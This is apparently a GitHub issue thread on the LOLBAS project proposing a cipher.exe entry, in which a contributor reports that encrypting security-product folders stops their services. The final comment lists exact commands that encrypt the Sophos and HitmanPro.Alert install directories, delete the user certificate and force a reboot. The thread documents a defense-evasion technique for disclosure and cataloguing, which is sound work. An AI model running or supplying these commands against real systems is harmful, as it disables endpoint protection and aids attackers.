LOLBAS icon indicating copy to clipboard operation
LOLBAS copied to clipboard
verified publisher icon LOLBAS-Project

Adding cipher.exe entry

Open conitrade-as opened this issue 2 years ago • 2 comments

conitrade-as avatar Jan 09 '23 10:01 conitrade-as

Indeed, Microsoft fixed it for Windows Defender (the initial assessment on their end was "valid but does not meet our bar for immediate servicing or it is not exploitable").

Disabling security features such as Windows Defender seems rather unexpected from my point of view. From you guidelines I'd say that:

  • Be a Microsoft-signed file: ✅
  • Have extra "unexpected" functionality -> This executable allows to modify executables which an administrative users should not be allowed to change.
  • Have functionality that would be useful to an APT or red team: ✅

Let me check once more if it still works for other vendors for which we tried this initially.

conitrade-as avatar Aug 07 '23 13:08 conitrade-as

Yes, it still works for other security products with the exact same result: Services not running any more. If you want to try yourself with e.g. Sophos Home here are a few steps you can use:

cipher.exe /e /s:'C:\Program Files\Sophos'
cipher.exe /e /s:'C:\Program Files (x86)\Sophos'
cipher.exe /e /s:'C:\Program Files (x86)\HitmanPro.Alert'
certutil.exe -delstore -user my %username%
shutdown.exe /r /t 0

conitrade-as avatar Aug 07 '23 14:08 conitrade-as